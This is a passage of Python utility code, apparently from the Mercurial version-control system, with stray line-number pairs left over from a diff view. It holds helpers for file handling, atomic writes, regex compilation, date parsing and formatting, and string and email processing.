        # close the handle even if reading fails
        fp.close()
1323 1322
def fstat(fp):
    '''Return stat data for fp, a file object that may lack fileno().

    If asking fp for its descriptor raises AttributeError, the path in
    fp.name is stat-ed instead.
    '''
    try:
        fd = fp.fileno()
    except AttributeError:
        return os.stat(fp.name)
    return os.fstat(fd)
1330 1329
1331 1330 # File system features
1332 1331
def fscasesensitive(path):
    """
    Tell whether path lives on a case-sensitive filesystem

    The final component of path (as in /foo/.hg) must be foldable; when
    neither upper- nor lower-casing changes it, True is returned because
    nothing speaks against case sensitivity.
    """
    origstat = os.lstat(path)
    parent, base = os.path.split(path)
    folded = base.upper()
    if folded == base:
        folded = base.lower()
        if folded == base:
            return True # no evidence against case sensitivity
    foldedpath = os.path.join(parent, folded)
    try:
        foldedstat = os.lstat(foldedpath)
    except OSError:
        # the case-folded name does not resolve
        return True
    # identical stat data means both spellings name the same entry
    return not (foldedstat == origstat)
1355 1354
# Probe for the optional re2 module. _re2 is left as None when the import
# succeeds (meaning "not checked yet") and set to False when it fails.
try:
    import re2
    _re2 = None
except ImportError:
    _re2 = False
1361 1360
class _re(object):
    '''Regular expression front end that uses re2 when it is usable.'''

    def _checkre2(self):
        '''Store in the module-level _re2 whether re2 matching works.'''
        global _re2
        try:
            # check if match works, see issue3964
            probe = re2.match(r'\[([^\[]+)\]', '[ui]')
            _re2 = bool(probe)
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile pat with re2 when possible, else with the re module

        re2 is only tried when no flag other than IGNORECASE and
        MULTILINE is requested; those two are passed to re2 as inline
        flags. For best performance, stick to re2-compatible regexp
        features.'''
        if _re2 is None:
            self._checkre2()
        re2flags = remod.IGNORECASE | remod.MULTILINE
        if _re2 and (flags & ~re2flags) == 0:
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                # re2 rejected the pattern; fall back to re below
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the escape function matching what self.compile uses.

        The match is imperfect: whether re2 or re ends up compiling a
        given pattern also depends on the flags, but this is the best
        that can be done.
        '''
        if _re2 is None:
            self._checkre2()
        return re2.escape if _re2 else remod.escape

re = _re()
1406 1405
_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.

    Each path component is looked up in a per-directory cache of
    directory listings; components that cannot be found are returned
    unchanged.
    '''
    def _makefspathcacheentry(dir):
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes so they stay literal inside the character
    # classes below. replace() returns a new string, so the result must
    # be assigned back for the escaping to take effect.
    seps = seps.replace('\\','\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            # separators are copied through verbatim
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patches of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)
1449 1448
def getfstype(dirpath):
    '''Return the filesystem type name for dirpath (best-effort)

    None means the type could not be determined, which is also the
    answer when osutil has no getfstype. Raises OSError on ENOENT,
    EPERM, etc.
    '''
    unknown = lambda x: None
    probe = getattr(osutil, 'getfstype', unknown)
    return probe(dirpath)
1456 1455
def checknlink(testfile):
    '''Return True if hardlink counts are reported properly next to
    testfile, False if they are not or the check cannot be made'''

    def _discard(path):
        # best-effort removal of a scratch file
        try:
            os.unlink(path)
        except OSError:
            pass

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    first = testfile + ".hgtmp1"
    if os.path.lexists(first):
        return False
    try:
        posixfile(first, 'w').close()
    except IOError:
        _discard(first)
        return False

    second = testfile + ".hgtmp2"
    handle = None
    try:
        oslink(first, second)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        handle = posixfile(second)
        return nlinks(second) > 1
    except OSError:
        return False
    finally:
        if handle is not None:
            handle.close()
        _discard(first)
        _discard(second)
1492 1491
def endswithsep(path):
    '''Tell whether path ends with os.sep or, if there is one, os.altsep.'''
    if path.endswith(pycompat.ossep):
        return True
    altsep = pycompat.osaltsep
    return altsep and path.endswith(altsep)
1497 1496
def splitpath(path):
    '''Return the components of path, split on os.sep.

    os.altsep is deliberately not considered, since this is meant as a
    stand-in for a plain "xxx.split(os.sep)". Run os.path.normpath() on
    the path first if that is needed.'''
    separator = pycompat.ossep
    return path.split(separator)
1505 1504
def gui():
    '''Tell whether we appear to be running in a GUI environment'''
    if pycompat.sysplatform != 'darwin':
        return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
    if 'SSH_CONNECTION' in encoding.environ:
        # handle SSH access to a box where the user is logged in
        return False
    if getattr(osutil, 'isgui', None):
        # check if a CoreGraphics session is available
        return osutil.isgui()
    # pure build; use a safe default
    return True
1520 1519
def mktempcopy(name, emptyok=False, createmode=None):
    """Create a temporary file with the same contents from name

    The temporary file is created in the directory of name. The
    permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    If name does not exist, the temporary file is left empty. On any
    other failure the temporary file is removed and the error is
    re-raised.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode)
    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        # Close both handles even when copying fails, so that they do not
        # leak and so that the cleanup below can remove the temporary
        # file on platforms that cannot delete open files.
        try:
            ofp = posixfile(temp, "wb")
            try:
                for chunk in filechunkiter(ifp):
                    ofp.write(chunk)
            finally:
                ofp.close()
        finally:
            ifp.close()
    except: # re-raises
        try: os.unlink(temp)
        except OSError: pass
        raise
    return temp
1559 1558
class filestat(object):
    """snapshot of stat data used to exactly detect change of a file

    The 'stat' attribute holds the 'os.stat()' result of the path the
    object was built from, or None if that path does not exist. This
    spares users of this class a preparative 'exists()' check.
    """
    def __init__(self, stat):
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        """Build a filestat from path; a missing path gives stat None"""
        try:
            st = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            st = None
        return cls(st)

    @classmethod
    def fromfp(cls, fp):
        """Build a filestat from the descriptor behind file object fp"""
        return cls(os.fstat(fp.fileno()))

    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            mine, theirs = self.stat, old.stat
            return (mine.st_size == theirs.st_size and
                    mine.st_ctime == theirs.st_ctime and
                    mine.st_mtime == theirs.st_mtime)
        except AttributeError:
            pass
        # at least one side has no usable stat data: equal only if both
        # sides recorded a missing file
        try:
            return self.stat is None and old.stat is None
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime  < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime  < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime  > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime  > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more at
        same time in sec (= S[n-1].ctime), and comparison of timestamp
        is ambiguous.

        Base idea to avoid such ambiguity is "advance mtime 1 sec, if
        timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because naturally advanced S[n].mtime in case (*1)
        might be equal to manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        by confliction between such mtime.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if size of a file isn't changed.

        False is returned when either side has no stat data.
        """
        try:
            newctime = self.stat.st_ctime
            oldctime = old.stat.st_ctime
        except AttributeError:
            return False
        return newctime == oldctime

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be previous filestat of 'path'. The times of 'path'
        are set to one second past the mtime recorded in 'old'.

        Returns True once the times were changed ("ambiguity is
        avoided"), or False if the process lacks the privileges to
        change them (EPERM), in which case nothing is done.
        """
        advanced = (old.stat.st_mtime + 1) & 0x7fffffff
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno != errno.EPERM:
                raise
            # utime() on the file created by another user causes EPERM,
            # if a process doesn't have appropriate privileges
            return False
        return True

    def __ne__(self, other):
        return not self == other
1661 1660
class atomictempfile(object):
    '''writable file object whose content replaces a file atomically

    Everything is written to a temporary copy of the original file.
    close() renames that copy over the original name, which is what
    makes the changes visible. If the object is destroyed or discarded
    without being closed, the writes are thrown away.

    The checkambig constructor argument is used with filestat, and is
    useful only if the target file is guarded by a lock (e.g. repo.lock
    or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name # permanent name
        truncating = 'w' in mode
        self._tempname = mktempcopy(name, emptyok=truncating,
                                    createmode=createmode)
        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        fp = self._fp
        self.read = fp.read
        self.write = fp.write
        self.seek = fp.seek
        self.tell = fp.tell
        self.fileno = fp.fileno

    def close(self):
        '''Finish writing and move the temporary copy into place.'''
        if self._fp.closed:
            return
        self._fp.close()
        filename = localpath(self.__name)
        oldstat = self._checkambig and filestat.frompath(filename)
        rename(self._tempname, filename)
        if oldstat and oldstat.stat:
            newstat = filestat.frompath(filename)
            if newstat.isambig(oldstat):
                # stat of changed file is ambiguous to original one
                advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
                os.utime(filename, (advanced, advanced))

    def discard(self):
        '''Drop the temporary copy, leaving the original file untouched.'''
        if self._fp.closed:
            return
        try:
            os.unlink(self._tempname)
        except OSError:
            pass
        self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        # commit on a clean exit, throw the writes away on error
        if exctype is None:
            self.close()
        else:
            self.discard()
1724 1723
def unlinkpath(f, ignoremissing=False):
    """remove file f, then its parent directories that became empty

    With ignoremissing, f is removed through tryunlink instead of
    unlink. An OSError while removing directories is ignored.
    """
    remove = tryunlink if ignoremissing else unlink
    remove(f)
    # try removing directories that might now be empty
    parent = os.path.dirname(f)
    try:
        removedirs(parent)
    except OSError:
        pass
1736 1735
def tryunlink(f):
    """Remove file f; an ENOENT failure is ignored, others are raised."""
    try:
        unlink(f)
    except OSError as e:
        if e.errno == errno.ENOENT:
            return
        raise
1744 1743
def makedirs(name, mode=None, notindexed=False):
    """create directory name and any missing parents

    mode, when given, is applied with chmod to every directory this call
    creates; nothing is changed for a directory that already exists.

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            return
        if not name or err.errno != errno.ENOENT:
            raise
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            raise
        # a parent is missing: create it first, then try again
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as racerr:
            # Catch EEXIST to handle races
            if racerr.errno != errno.EEXIST:
                raise
            return
    if mode is not None:
        os.chmod(name, mode)
1772 1771
def readfile(path):
    '''Return the whole content of the file at path, read in binary mode.'''
    with open(path, 'rb') as source:
        content = source.read()
    return content
1776 1775
def writefile(path, text):
    '''Replace the content of the file at path with text (binary mode).'''
    with open(path, 'wb') as target:
        target.write(text)
1780 1779
def appendfile(path, text):
    '''Add text to the end of the file at path (binary mode).'''
    with open(path, 'ab') as target:
        target.write(text)
1784 1783
class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def splitbig(chunks):
            # chunks above 1MB are handed out in 256kB pieces
            for chunk in chunks:
                if len(chunk) > 2**20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2 ** 18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk
        self.iter = splitbig(in_iter)
        # chunks pulled from the iterator but not fully consumed yet
        self._queue = collections.deque()
        # number of bytes of self._queue[0] that were already returned
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If size parameter is omitted, read everything"""
        if l is None:
            # Earlier sized reads may have left data in the queue; return
            # it ahead of whatever the iterator still has instead of
            # dropping it.
            queue = self._queue
            pending = []
            if queue:
                pending.append(queue.popleft()[self._chunkoffset:])
                pending.extend(queue)
                queue.clear()
                self._chunkoffset = 0
            pending.extend(self.iter)
            return ''.join(pending)

        left = l
        buf = []
        queue = self._queue
        while left > 0:
            # refill the queue
            if not queue:
                target = 2**18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    break

            # The easy way to do this would be to queue.popleft(), modify the
            # chunk (if necessary), then queue.appendleft(). However, for cases
            # where we read partial chunk content, this incurs 2 dequeue
            # mutations and creates a new str for the remaining chunk in the
            # queue. Our code below avoids this overhead.

            chunk = queue[0]
            chunkl = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and left >= chunkl:
                left -= chunkl
                queue.popleft()
                buf.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            chunkremaining = chunkl - offset

            # Use all of unconsumed part of chunk.
            if left >= chunkremaining:
                left -= chunkremaining
                queue.popleft()
                # offset == 0 is enabled by block above, so this won't merely
                # copy via ``chunk[0:]``.
                buf.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                buf.append(chunk[offset:offset + left])
                self._chunkoffset += left
                # drives left to zero or below, which ends the loop
                left -= chunkremaining

        return ''.join(buf)
1864 1863
def filechunkiter(f, size=131072, limit=None):
    """Generate the data of file f in pieces of at most size bytes
    (default 131072), stopping after limit bytes when limit is given
    (default is to read all data). A piece may be shorter than size if
    it is the last one in the file, or if f is a socket or some other
    type of file that sometimes reads less data than is requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        nbytes = size if limit is None else min(limit, size)
        # never call read() for zero bytes
        s = nbytes and f.read(nbytes)
        if not s:
            return
        if limit:
            limit -= len(s)
        yield s
1885 1884
def makedate(timestamp=None):
    '''Return timestamp (the current time if omitted) as a (unixtime,
    offset) tuple, the offset being taken from the local timezone.

    Aborts if timestamp is negative.'''
    if timestamp is None:
        timestamp = time.time()
    if timestamp < 0:
        hint = _("check your clock")
        raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
    utc = datetime.datetime.utcfromtimestamp(timestamp)
    local = datetime.datetime.fromtimestamp(timestamp)
    delta = utc - local
    return timestamp, delta.days * 86400 + delta.seconds
1898 1897
def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
    """format a (unixtime, offset) tuple as a localized time string.
    unixtime is seconds since the epoch, and offset is the time zone's
    number of seconds away from UTC. The current time is used when no
    date is given.

    >>> datestr((0, 0))
    'Thu Jan 01 00:00:00 1970 +0000'
    >>> datestr((42, 0))
    'Thu Jan 01 00:00:42 1970 +0000'
    >>> datestr((-42, 0))
    'Wed Dec 31 23:59:18 1969 +0000'
    >>> datestr((0x7fffffff, 0))
    'Tue Jan 19 03:14:07 2038 +0000'
    >>> datestr((-0x80000000, 0))
    'Fri Dec 13 20:45:52 1901 +0000'
    """
    t, tz = date or makedate()
    if any(code in format for code in ("%1", "%2", "%z")):
        if tz > 0:
            sign = "-"
        else:
            sign = "+"
        q, r = divmod(abs(tz) // 60, 60)
        # %z is spelled as %1%2, which then expand to the signed hours
        # and the minutes of the offset
        for code, text in (("%z", "%1%2"),
                           ("%1", "%c%02d" % (sign, q)),
                           ("%2", "%02d" % r)):
            format = format.replace(code, text)
    # clamp to the signed 32-bit range
    d = max(-0x80000000, min(0x7fffffff, t - tz))
    # Never use time.gmtime() and datetime.datetime.fromtimestamp()
    # because they use the gmtime() system call which is buggy on Windows
    # for negative values.
    t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
    return encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1934 1933
def shortdate(date=None):
    """format a (timestamp, tzoff) tuple as a YYYY-MM-DD date string."""
    dayformat = '%Y-%m-%d'
    return datestr(date, format=dayformat)
1938 1937
def parsetimezone(s):
    """look for a timezone at the end of string s, and return an
    (offset, remainder) pair; offset is None if no timezone was found"""

    def tzoffset(signchar, hours, minutes):
        # a "+" zone yields a negative offset and vice versa
        direction = 1 if signchar == "+" else -1
        return -direction * (int(hours) * 60 + int(minutes)) * 60

    if s.endswith(("GMT", "UTC")):
        return 0, s[:-3].rstrip()

    # Unix-style timezones [+-]hhmm
    if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
        return tzoffset(s[-5], s[-4:-2], s[-2:]), s[:-5].rstrip()

    # ISO8601 trailing Z
    if s.endswith("Z") and s[-2:-1].isdigit():
        return 0, s[:-1]

    # ISO8601-style [+-]hh:mm
    colonstyle = (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
                  s[-5:-3].isdigit() and s[-2:].isdigit())
    if colonstyle:
        return tzoffset(s[-6], s[-5:-3], s[-2:]), s[:-6]

    return None, s
1966 1965
def strdate(string, format, defaults=None):
    """parse localized time string with format and return a (unixtime,
    offset) tuple. Elements that format does not mention are taken from
    defaults. ValueError is raised if the string cannot be parsed."""
    if defaults is None:
        defaults = {}

    # NOTE: unixtime = localunixtime + offset
    offset, date = parsetimezone(string)

    # add missing elements from defaults
    usenow = False # default to using biased defaults
    for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
        part = pycompat.bytestr(part)
        if any(("%" + p) in format for p in part):
            # We've found a specific time element, less specific time
            # elements are relative to today
            usenow = True
            continue
        date += "@" + defaults[part][usenow]
        format += "@%" + part[0]

    timetuple = time.strptime(encoding.strfromlocal(date),
                              encoding.strfromlocal(format))
    localunixtime = int(calendar.timegm(timetuple))
    if offset is not None:
        return localunixtime + offset, offset
    # local timezone
    unixtime = int(time.mktime(timetuple))
    return unixtime, unixtime - localunixtime
1999 1998
def parsedate(date, formats=None, bias=None):
    """parse a localized date/time and return a (unixtime, offset) tuple.

    The date may be a "unixtime offset" string or in one of the specified
    formats. If the date already is a (unixtime, offset) tuple, it is
    returned as is, and an empty date gives (0, 0).

    >>> parsedate(' today ') == parsedate(\
                                  datetime.date.today().strftime('%b %d'))
    True
    >>> parsedate( 'yesterday ') == parsedate((datetime.date.today() -\
                                               datetime.timedelta(days=1)\
                                              ).strftime('%b %d'))
    True
    >>> now, tz = makedate()
    >>> strnow, strtz = parsedate('now')
    >>> (strnow - now) < 1
    True
    >>> tz == strtz
    True
    """
    if bias is None:
        bias = {}
    if not date:
        return 0, 0
    if isinstance(date, tuple) and len(date) == 2:
        return date
    if not formats:
        formats = defaultdateformats
    date = date.strip()

    if date in ('now', _('now')):
        return makedate()
    if date in ('today', _('today')):
        date = datetime.date.today().strftime('%b %d')
    elif date in ('yesterday', _('yesterday')):
        yesterday = datetime.date.today() - datetime.timedelta(days=1)
        date = yesterday.strftime('%b %d')

    try:
        when, offset = map(int, date.split(' '))
    except ValueError:
        # fill out defaults
        now = makedate()
        defaults = {}
        for part in ("d", "mb", "yY", "HI", "M", "S"):
            # this piece is for rounding the specific end of unknowns
            b = bias.get(part)
            if b is None:
                b = "00" if part[0:1] in "HMS" else "0"

            # this piece is for matching the generic end to today's date
            n = datestr(now, "%" + part[0:1])

            defaults[part] = (b, n)

        # the first format that parses wins
        for format in formats:
            try:
                when, offset = strdate(date, format, defaults)
            except (ValueError, OverflowError):
                continue
            break
        else:
            raise error.ParseError(_('invalid date: %r') % date)
    # validate explicit (probably user-specified) date and
    # time zone offset. values must fit in signed 32 bits for
    # current 32-bit linux runtimes. timezones go from UTC-12
    # to UTC+14
    if not (-0x80000000 <= when <= 0x7fffffff):
        raise error.ParseError(_('date exceeds 32 bits: %d') % when)
    if not (-50400 <= offset <= 43200):
        raise error.ParseError(_('impossible time zone offset: %d') % offset)
    return when, offset
2076 2075
def matchdate(date):
    """Return a function that matches a given date match specifier

    Formats include:

    '{date}' match a given date to the accuracy provided

    '<{date}' on or before a given date

    '>{date}' on or after a given date

    '-{days}' within the given number of days of now

    '{date} to {date}' between two dates, both included

    The returned function takes a unixtime and returns a boolean.
    Aborts on an empty or malformed specifier.

    >>> p1 = parsedate("10:29:59")
    >>> p2 = parsedate("10:30:00")
    >>> p3 = parsedate("10:30:59")
    >>> p4 = parsedate("10:31:00")
    >>> p5 = parsedate("Sep 15 10:30:00 1999")
    >>> f = matchdate("10:30")
    >>> f(p1[0])
    False
    >>> f(p2[0])
    True
    >>> f(p3[0])
    True
    >>> f(p4[0])
    False
    >>> f(p5[0])
    False
    """

    def lower(date):
        # earliest time covered by date: unspecified parts round down
        d = {'mb': "1", 'd': "1"}
        return parsedate(date, extendeddateformats, d)[0]

    def upper(date):
        # latest time covered by date: unspecified parts round up
        d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
        for days in ("31", "30", "29"):
            try:
                d["d"] = days
                return parsedate(date, extendeddateformats, d)[0]
            except (Abort, error.ParseError):
                # parsedate() reports an unparseable date (such as a day
                # the month does not have) with error.ParseError; try the
                # next shorter month length
                pass
        d["d"] = "28"
        return parsedate(date, extendeddateformats, d)[0]

    date = date.strip()

    if not date:
        raise Abort(_("dates cannot consist entirely of whitespace"))
    elif date[0] == "<":
        if not date[1:]:
            raise Abort(_("invalid day spec, use '<DATE'"))
        when = upper(date[1:])
        return lambda x: x <= when
    elif date[0] == ">":
        if not date[1:]:
            raise Abort(_("invalid day spec, use '>DATE'"))
        when = lower(date[1:])
        return lambda x: x >= when
    elif date[0] == "-":
        try:
            days = int(date[1:])
        except ValueError:
            raise Abort(_("invalid day spec: %s") % date[1:])
        if days < 0:
            raise Abort(_("%s must be nonnegative (see 'hg help dates')")
                        % date[1:])
        when = makedate()[0] - days * 3600 * 24
        return lambda x: x >= when
    elif " to " in date:
        a, b = date.split(" to ")
        start, stop = lower(a), upper(b)
        return lambda x: x >= start and x <= stop
    else:
        start, stop = lower(date), upper(date)
        return lambda x: x >= start and x <= stop
2152 2151
def stringmatcher(pattern, casesensitive=True):
    """
    takes a string that may start with a 're:' or 'literal:' prefix.
    returns the matcher name, the pattern without that prefix, and the
    matcher function.
    a missing or unknown prefix means a literal match.

    helper for tests:
    >>> def test(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])
    >>> def itest(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])

    exact matching (no prefix):
    >>> test('abcdefg', 'abc', 'def', 'abcdefg')
    ('literal', 'abcdefg', [False, False, True])

    regex matching ('re:' prefix)
    >>> test('re:a.+b', 'nomatch', 'fooadef', 'fooadefbar')
    ('re', 'a.+b', [False, False, True])

    force exact matches ('literal:' prefix)
    >>> test('literal:re:foobar', 'foobar', 're:foobar')
    ('literal', 're:foobar', [False, True])

    unknown prefixes are ignored and treated as literals
    >>> test('foo:bar', 'foo', 'bar', 'foo:bar')
    ('literal', 'foo:bar', [False, False, True])

    case insensitive regex matches
    >>> itest('re:A.+b', 'nomatch', 'fooadef', 'fooadefBar')
    ('re', 'A.+b', [False, False, True])

    case insensitive literal matches
    >>> itest('ABCDEFG', 'abc', 'def', 'abcdefg')
    ('literal', 'ABCDEFG', [False, False, True])
    """
    if pattern.startswith('re:'):
        pattern = pattern[3:]
        try:
            flags = 0 if casesensitive else remod.I
            regex = remod.compile(pattern, flags)
        except remod.error as e:
            raise error.ParseError(_('invalid regular expression: %s')
                                   % e)
        return 're', pattern, regex.search

    if pattern.startswith('literal:'):
        pattern = pattern[8:]

    if casesensitive:
        return 'literal', pattern, pattern.__eq__

    # compare case-folded forms of both sides
    ipat = encoding.lower(pattern)
    return 'literal', pattern, lambda s: ipat == encoding.lower(s)
2211 2210
def shortuser(user):
    """Return a short representation of a user name or email address.

    The domain (from the first '@') is dropped, then anything up to and
    including the first '<', then anything from the first space, and
    finally anything from the first dot.
    """
    user = user.split('@', 1)[0]
    user = user.split('<', 1)[-1]
    user = user.split(' ', 1)[0]
    user = user.split('.', 1)[0]
    return user
2227 2226
def emailuser(user):
    """Return the user portion of an email address.

    Everything from the first '@' on is dropped, then everything up to
    and including the first '<'.
    """
    local = user.split('@', 1)[0]
    return local.split('<', 1)[-1]
2237 2236
def email(author):
    '''get email of author.

    Returns the text after the first '<' (or from the start when there is
    none) up to the first '>' (or to the end when there is none).
    '''
    start = author.find('<') + 1
    end = author.find('>')
    if end < 0:
        return author[start:]
    return author[start:end]
2244 2243
def ellipsis(text, maxlength=400):
    """Trim string to at most maxlength (default: 400) columns in display.

    Delegates to encoding.trim(), passing '...' as the ellipsis marker.
    """
    trimmed = encoding.trim(text, maxlength, ellipsis='...')
    return trimmed
2248 2247
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity

    Each entry of unittable is a (multiplier, divisor, format) triple. The
    first entry whose multiplier * divisor does not exceed abs(count) is
    used to format count / divisor. When no entry qualifies, the format of
    the last entry is applied to the raw count.
    '''

    def go(count):
        for multiplier, divisor, fmt in unittable:
            threshold = divisor * multiplier
            if abs(count) < threshold:
                continue
            scaled = count / float(divisor)
            return fmt % scaled
        fallback = unittable[-1][2]
        return fallback % count

    return go
2259 2258
def processlinerange(fromline, toline):
    """Validate the line range <fromline>:<toline> and convert it to a
    0-based range.

    Raises error.ParseError when toline is before fromline, or when
    fromline is lower than 1.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
        ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
        ...
    ParseError: fromline must be strictly positive
    """
    span = toline - fromline
    if span < 0:
        raise error.ParseError(_("line range must be positive"))
    if not fromline >= 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    return (fromline - 1, toline)
2280 2279
# Render a byte count as a human-readable string. Each row is a
# (multiplier, divisor, format) triple consumed by unitcountfn(): rows are
# tried top to bottom and the first one with abs(count) >=
# multiplier * divisor formats count / divisor. Larger values therefore get
# fewer decimal places.
bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )
2293 2292
# Matches a single EOL, which is either a LF or a CRLF (any run of
# repeated CRs before the LF is part of the match, so it is removed on
# substitution). We do not care about old Macintosh files, so a stray CR
# is an error.
_eolre = remod.compile(br'\r*\n')
2298 2297
def tolf(s):
    """Return s with every EOL matched by _eolre replaced by LF."""
    converted = _eolre.sub('\n', s)
    return converted
2301 2300
def tocrlf(s):
    """Return s with every EOL matched by _eolre replaced by CRLF."""
    converted = _eolre.sub('\r\n', s)
    return converted
2304 2303
# Pick the EOL converters for this platform: real conversions only when
# the OS line separator is CRLF, identity functions otherwise.
if pycompat.oslinesep != '\r\n':
    tonativeeol = fromnativeeol = pycompat.identity
else:
    tonativeeol, fromnativeeol = tocrlf, tolf
2311 2310
def escapestr(s):
    """Return s with backslash escapes applied, as string_escape would."""
    # s.encode('string_escape') is not available on Python 3, so go
    # through the codec function it is built on; that returns a
    # (result, length) pair of which only the result is wanted.
    escaped, _consumed = codecs.escape_encode(s)
    return escaped
2316 2315
def unescapestr(s):
    """Return s with backslash escape sequences decoded."""
    # codecs.escape_decode() returns a (result, length) pair.
    unescaped, _consumed = codecs.escape_decode(s)
    return unescaped
2319 2318
def forcebytestr(obj):
    """Portably format an arbitrary object (e.g. exception) into a byte
    string.

    Falls back to converting str(obj) through encoding.strtolocal() when
    the direct conversion raises UnicodeEncodeError.
    """
    try:
        result = pycompat.bytestr(obj)
    except UnicodeEncodeError:
        # non-ascii string, may be lossy
        localized = encoding.strtolocal(str(obj))
        result = pycompat.bytestr(localized)
    return result
2328 2327
def uirepr(s):
    """Return repr(s) with each doubled backslash collapsed to one."""
    # Avoid double backslash in Windows path repr()
    text = repr(s)
    return text.replace('\\\\', '\\')
2332 2331
2333 2332 # delay import of textwrap
def MBTextWrapper(**kwargs):
    """Return a width-aware text wrapper built from the given keyword args.

